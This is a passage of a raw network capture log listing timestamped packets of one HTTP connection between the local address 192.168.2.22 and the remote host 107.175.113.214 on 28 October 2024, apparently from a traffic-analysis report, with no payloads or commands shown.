                                                        Oct 28, 2024 11:21:40.296200037 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296207905 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296217918 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296219110 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296228886 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296241999 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296262026 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296272039 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296298981 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296341896 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296466112 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296499014 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296515942 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296526909 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296538115 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296547890 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296550989 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296559095 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296562910 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296569109 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296580076 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296591043 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296591043 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296614885 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296626091 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296634912 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296637058 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296654940 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296665907 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296667099 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296675920 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296684980 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296688080 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296698093 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296709061 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296709061 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296720982 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296725035 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296731949 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296742916 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296744108 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296753883 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296765089 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296786070 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296788931 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296797991 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296807051 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296824932 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296834946 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296845913 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296847105 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296857119 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296866894 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296866894 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296869040 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296880007 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296890974 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296895027 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296901941 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296905041 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296912909 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296930075 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296946049 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296957970 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296962976 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296962976 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296962976 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296968937 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.296987057 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.296988964 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297008038 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297008991 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297019005 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297029018 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297029018 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297039986 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297049999 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297050953 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297060013 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297070980 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297072887 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297081947 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297091961 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297103882 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297115088 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297125101 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297128916 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297128916 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297137022 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297139883 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297149897 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297166109 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297177076 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297178030 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297178030 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297187090 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297203064 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297203064 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297214985 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297216892 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297224998 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297236919 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297241926 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297259092 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297271013 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297277927 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297281981 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297297001 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297307014 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297307014 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297310114 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297323942 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297324896 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297334909 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297346115 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297355890 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297358036 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297365904 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297368050 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297383070 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297389984 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297395945 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297408104 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297420025 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297426939 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297426939 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297431946 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297444105 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297450066 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297461987 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297466993 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297472954 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297483921 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297492981 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297496080 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297508001 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297509909 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297519922 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297532082 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297543049 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297554016 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297554970 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297554970 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297564983 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297569036 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297580004 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297590971 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297595024 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297601938 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297616005 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297616005 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297626972 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297629118 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297641039 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297653913 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297653913 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297665119 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297667027 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297677040 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297688007 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297698975 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297709942 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297720909 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297720909 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297720909 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297720909 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297734022 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297754049 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297755957 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297779083 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297790051 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297791004 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297800064 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297802925 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297813892 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297825098 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297827959 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297837973 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297849894 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297861099 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297868967 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297869921 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297873020 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297890902 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297907114 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297920942 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297920942 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297920942 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297924995 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297938108 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297941923 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297952890 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297964096 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297967911 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297975063 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297985077 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.297991037 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.297996998 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298007965 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298011065 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298018932 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298031092 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298042059 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298053980 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298058987 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298058987 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298064947 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298068047 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298082113 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298090935 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298093081 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298104048 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298113108 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298115015 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298126936 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298135996 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298146963 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298149109 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298149109 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298165083 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298173904 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298183918 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298194885 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298202991 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298206091 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298212051 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298218012 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298229933 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298240900 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298248053 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298248053 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298259020 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298269987 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298273087 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298280954 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298283100 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298293114 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298304081 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298314095 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298321962 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298321962 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298326015 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298341990 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298346043 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298357010 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298367977 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298372030 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298374891 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298386097 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298392057 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298397064 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298408031 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298413992 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298418999 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298429012 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298435926 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298440933 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298451900 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298455954 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298461914 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298471928 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298480988 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298491001 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298492908 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298505068 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298511982 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298515081 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298526049 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298532009 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298538923 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298549891 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298553944 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298561096 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.298573971 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298595905 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.298629999 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.301554918 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.301626921 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304006100 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304017067 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304027081 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304071903 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304081917 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304183006 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304212093 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304223061 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304233074 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304243088 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304244995 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304253101 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304264069 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304266930 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304274082 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304284096 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304284096 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304296017 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304306984 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304311991 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304317951 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304328918 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304332972 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304338932 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304349899 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304351091 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304361105 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304372072 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304372072 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304383993 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304388046 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304394960 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304409981 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304430962 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304462910 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304733992 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304754019 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304764032 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304791927 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304811001 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304919004 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304929018 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304936886 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304946899 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304965019 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304975033 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304976940 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304985046 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.304995060 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.304996014 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305006027 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305011988 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305016994 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305027962 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305036068 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305037975 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305043936 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305048943 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305054903 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305059910 CET8049167107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:40.305099010 CET4916780192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:40.305099010 CET4916780192.168.2.22107.175.113.214
